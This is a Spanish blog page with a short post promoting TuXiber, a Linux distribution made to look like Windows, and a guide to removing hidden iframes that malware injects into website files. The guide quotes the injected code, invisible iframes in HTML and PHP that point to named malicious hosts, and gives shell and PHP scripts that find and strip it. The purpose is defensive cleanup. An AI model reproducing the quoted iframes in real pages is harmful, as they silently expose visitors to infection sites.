TuXiber – Linux con apariencia de Windows

Tuxiber es otra opción de tener un Linux con apariencia de Windows, este ya viene configurado desde su instalación para que no se tenga que hacer ningún cambio después de instalarlo y como todo Linux, permite ser instalado conjuntamente con otros sistemas operativos, como Windows.

La ventaja es que viene en versión live, un DVD de 1.2 GB, y esto nos permite probar su funcionamiento y apariencia antes de decidirnos a instalarlo.

Pueden revisar la página web de TUXIBER para ver algunas capturas de pantalla o videos.

Tal vez algunos dirán ¿para qué o por qué alguien pierde el tiempo en tratar de imitar un sistema operativo que no vale la pena?. No es perdida de tiempo, así como alguien perdió su tiempo y dinero en la creación y distribución de Ubuntu el cual se está convirtiendo en el Linux más popular, para algunos puede ser sólo eso, perdida de tiempo, pero la idea de TuXiber es llegar a gente que está acostumbrada a Windows y que esta gente pueda usar Linux sin problemas ni complicaciones.

No es lo mismo darle a un usuario de Windows una distribución de Linux con Gnome o KDE con su apariencia por defecto y decirle que realice sus tareas cotidianas, a darle un entorno de escritorio el cual luzca muy similar a Windows, ya que en el primer caso el usuario se desesperará y preferirá no hacer sus tareas cotidianas o realizará demasiadas preguntas para realizar sus tareas, en cambio, en el segundo caso comenzarán a realizar sus tareas inmediatamente.

Es por eso que TuXiber tiene la apariencia de Windows para hacer que Linux sea utilizado por las personas que no saben de su existencia.

Eliminación automática de iframe oculto

En este pequeño artículo describo la forma para eliminar los iframes que ciertos malware agregan a nuestro sitio para infectar otras computadoras, al parecer se trata de un virus o spyware llamado SALITY, ya que este malware se encarga de infectar archivos con extensiones .exe y .src, además de inyectar código html de un iframe en archivos HTML, PHP y ASP.

Cuando a mi me sucedió esto, estuve buscando en Internet una forma de eliminarlo automáticamente de todos mis sitios infectado, ya que desafortunadamente no contaba con un respaldo para reemplazar los archivos infectados, después de mucho buscar no la encontré, lo que encontré fue un script muy complejo y desde mi punto de vista, nada legible, además su autor no garantizaba su funcionamiento, había otra solución pero había que pagar por ella.

De acuerdo a toda la información encontrada me di cuenta que hay sitios en donde dicen que se trata de un vulnerabilidad en PHP (PHP Exploit), lo cual no es cierto, ya que esto es debido a un malware que reside en la computadora desde la cual se accede al servidor, de esta forma el malware puede acceder ya que conoce el nombre de usuario y contraseña.

Lo que hace este malware es agregar código a las páginas principales de los sitios que logra infectar, básicamente agrega iframes ocultos con referencia a sitios infectados, esto lo hace en HTML,  PHP o ASP, en archivos index, default o algunos otros considerados como principales.

En caso de HTML agrega algo como esto:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

En los casos de PHP puede realizar algo como esto:

<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\"http:// xtrarobotz . com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// nipkelo .net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// internetcountercheck . com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

Como se podrá observar, el sitio referenciado puede variar, existe una lista de sitios de los cuales se sabe están infectados.

En mi caso, en mis sitios me aparecían tanto en HTML como en PHP iframes del sitio internetcountercheck.

SOLUCIÓN

Para empezar, si eres víctima de este tipo de ataque lo primero que debes de realizar es cambiar tu contraseña de tu servidor ftp, ya que esta es la forma o fue la forma en la que pudieron acceder a tu sitio para la inyección de código.

Hosting economico

También debes de hacer un análisis de tu computadora en busca de virus y cualquier malware que pudiera existir, ya que si no te deshaces del malware, no sirve de nada cambiar la contraseña, puesto que seguirás accediendo al servidor desde tu computadora infectada. Desafortunadamente, si el virus que tenemos en nuestra computadora es el SALITY lo más probable es que nuestro antivirus ya no funcione ya que estará también infectado con el sality, así que lo recomendable será instalar otro antivirus.

Una vez estés seguro de que ya no existe algún malware en tu computadora puedes proceder a la limpieza de tu sitio.

Para revisar los archivos realicé el siguiente script del shell:

1: for i in `find .`; do
2:       if grep -q “<iframe” $i; then
3:          echo “Archivo” $i >> salida.txt
4:          grep -n “<iframe” $i >> salida.txt
5:       fi
6: done

Para aquellos que no conocen mucho acerca de esto, explico brevemente lo que se está realizando:

Línea 1: Enlista todos los archivos comenzando en el directorio actual (Esta instrucción puede ser cambiada por alguna equivalente como ls -R).

Línea 2: Para cada archivo encontrado, revisa si existe la cadena “<iframe”.

En caso de haber encontrado la cadena “<iframe” en algún archivo

Línea 3: Escribe al archivo salida.txt la ruta y el nombre del archivo con la cadena.

Línea 4: Escribe al archivo salida.txt el número de la línea en que fue encontrada la cadena e inmediatamente después escribe el contenido de la línea.

Eso me sirvió para encontrar los archivos que contengan iframes, debido a que este script realiza una búsqueda exhaustiva, puede tardar dependiendo de la cantidad de archivos en tu sitio web, en mi caso tardo al rededor de 2 minutos en un servidor que tiene 7 sitios web. En el archivo salida.txt se pueden observar los resultados, el nombre del archivo, así como la línea donde se encuentra el iframe. Eso sirve para observar cierto comportamiento y al momento de eliminar sea más rápido.

En mi caso, como utilizo iframes de otros sitios, me daban resultados diferentes, pero de los iframes que no eran mios los identifiqué con la URL del sitio internetcountercheck.com por lo que para el proceso de eliminación utilicé el siguiente script:

1: for i in `find .  |grep index`; do
2:       if grep “internetcountercheck” $i; then
3:          echo “Removiendo de ” $i
4:          sed ‘s/[echo “]*<iframe src=[\\]*”http:\/\/internetcounter[^>]*>[\w]*<\/iframe>[“;]*//g’ $i > $i.tmp
5:          mv $i.tmp $i
6:       fi
7: done
8: rm salida.txt

Explicación de el script:

Línea 1: Enlista todos los archivos de tipo index, esto es porque en mi caso únicamente encontré archivos index con iframe, pero también se pueden encontrar archivos default u otros, en ese caso es recomendable cambiar el script y reemplazar index por el nombre según sea necesario.

Línea 2: Busca archivos que contengan la cadena “internetcountercheck” (Esta puede ser cambiada por la cadena que se encuentre en tus archivos o en caso de que no manejes iframes puede quedarse la cadena”<iframe”)

Línea 3: Indica el archivo de donde se eliminará el iframe

Línea 4: Esta es la línea importante, ya que es aquí en donde se elimina el código malicioso. La cadena que cambiaste en la línea 2 por la cadena “internetcountercheck” deberás de cambiarla también en esta línea. En caso de que no manejaras iframes en tu sitio y que desees que se eliminen todos los iframes que existan la línea 4 puede ser substituida por esta:

4:          sed ‘s/[echo “]*<iframe[^>]*>[\w]*<\/iframe>[“;]*//g’ $i > $i.tmp

Línea 5: Debido a que el resultado de la línea 4 se almacena en otro archivo, se renombra el archivo temporal con el nombre original.

Línea 8: Al final se elimina el archivo salida.txt, esto es para que se vuelva a ejecutar el script que busca el código malicioso y no exista la información anterior en el archivo de salida.

Con estos dos scripts quedaron limpios mis sitios.

Estos dos scripts se pueden ejecutar desde la línea de comandos en caso de tener acceso a través de ssh, pero en la mayoría de los casos esto no es posible, así que para ello realicé 2 archivos en PHP en donde se ejecutan estos scripts.

Aquí dejo los archivos que ocupé para la eliminación de los iframe, modifícalos y adáptalos a tu caso. Una vez que hayas descomprimido los archivos y los hayas subido a tu servidor recuerda asignar permisos de ejecución a los archivos .sh, de preferencia que tengan el valor 500. Es recomendable subir los archivos al directorio raíz de tu sitio Web, por lo general es public_html. Para poder realizar los pasos lo único que debes de hacer es ingresar desde un navegador de la siguiente forma:

http://tudominio.terminacion/buscapalabra.php

http://tudominio.terminacion/eliminaiframe.php

Habiendo adaptado a tus necesidades los scripts

Descarga los Scripts

Espero les sirva a muchos así como a mi me ha funcionado y en caso de que lleguen a tener problemas con los scripts, expongan sus dudas para que sean aclaradas.